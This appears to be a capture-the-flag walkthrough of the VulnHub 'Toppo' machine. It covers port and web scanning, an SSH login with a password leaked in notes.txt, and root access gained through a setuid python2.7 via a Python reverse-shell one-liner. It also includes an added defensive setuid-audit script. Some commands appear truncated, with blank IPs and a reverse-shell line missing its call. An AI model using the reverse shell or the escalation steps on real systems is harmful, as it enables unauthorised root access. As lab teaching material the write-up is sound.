We download the VBox image from VulnHub or from alfaexploit:

We take a look at the services on offer:

RX4 ☢ /home/kr0m> nmap -sT -p 0-65535
Starting Nmap 7.70 ( ) at 2018-09-03 16:46 CEST
Nmap scan report for
Host is up (0.00056s latency).
Not shown: 65532 closed ports
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
56149/tcp open  unknown
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds

We run Nikto to see what it shows us:

RX4 ☢ /home/kr0m/nikto/program> ./ -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2018-09-03 16:48:23 (GMT2)
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.25). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7796 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2018-09-03 16:48:32 (GMT2) (9 seconds)
+ 1 host(s) tested

Browsing with Firefox we see that there is a file called notes.txt.

RX4 ☢ /home/kr0m> curl
Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

With a bit of luck we have access:

RX4 ☢ /home/kr0m> ssh ted@
ted@'s password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

We download linuxprivchecker:

chmod 700

[+] Shadow File (Privileged)

Is the Python script able to dump the shadow file without permissions?

ted@Toppo:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

We keep investigating:

ted@Toppo:~$ ls -la /usr/bin/python
lrwxrwxrwx 1 root root 9 Mar 16  2015 /usr/bin/python -> python2.7

ted@Toppo:~$ ls -la /usr/bin/python2.7
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7

That setuid bit: once again we see how wrongly assigned permissions can compromise the whole system.
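A defender would want to catch a setuid-root interpreter like this before anyone else does. The following audit script is an added example, not part of the original write-up or of linuxprivchecker: it walks a tree for setuid/setgid regular files and rates each one, treating interpreters, shells and editors as critical and any setuid binary that is group- or world-writable (like the -rwsrwxrwx python2.7 above) as high. The list of risky basenames is an assumption; extend it for your own fleet.

```python
#!/usr/bin/env python3
"""Audit a directory tree for setuid/setgid files and flag interpreters that
must never carry those bits. Added example, not from the original write-up;
RISKY_BASENAMES is an assumed list, extend it as needed."""
import os
import stat

# Interpreters, shells and editors: a setuid-root copy of any of these hands
# root to every local user who can run it (assumed list).
RISKY_BASENAMES = {
    "python", "python2", "python2.7", "python3", "perl", "ruby", "php", "node",
    "bash", "sh", "dash", "zsh", "ksh", "vim", "vi", "nano", "less", "more",
    "find", "awk", "gawk", "env",
}

def find_setuid_files(root):
    """Yield (path, mode) for every regular file under root with setuid or setgid set."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # do not follow symlinks while walking
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st.st_mode

def classify(path, mode):
    """Rate one setuid/setgid file: CRITICAL for interpreters/shells, HIGH if the
    binary is also group- or world-writable (anyone could replace it), else INFO."""
    base = os.path.basename(os.path.realpath(path))  # python -> python2.7 resolves
    bits = [b for b, m in (("setuid", stat.S_ISUID), ("setgid", stat.S_ISGID)) if mode & m]
    writable = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
    if base in RISKY_BASENAMES or base.startswith(("python", "perl")):
        severity = "CRITICAL"
    elif writable:
        severity = "HIGH"
    else:
        severity = "INFO"
    return {"path": path, "bits": bits, "writable_by_others": writable,
            "severity": severity, "mode": stat.filemode(mode)}

def audit(entries):
    """Classify (path, mode) pairs, worst findings first."""
    order = {"CRITICAL": 0, "HIGH": 1, "INFO": 2}
    return sorted((classify(p, m) for p, m in entries), key=lambda f: order[f["severity"]])

if __name__ == "__main__":
    import sys
    for finding in audit(find_setuid_files(sys.argv[1] if len(sys.argv) > 1 else "/")):
        print(f'{finding["severity"]:8} {finding["mode"]} {finding["path"]}')
```

Run it as root (or over a mounted image) so unreadable directories are not silently skipped, and diff its output against a known-good baseline on each run.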

We try to launch a shell from the Python interpreter:

ted@Toppo:~$ python -c "import pty;pty.spawn('/bin/bash')"
bash-4.3$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3$ cat /etc/shadow
cat: /etc/shadow: Permission denied

Let's try a reverse connection:

RX4 ✺ ~> nc -l -p 1234
ted@Toppo:~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
RX4 ✺ ~> nc -l -p 1234
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

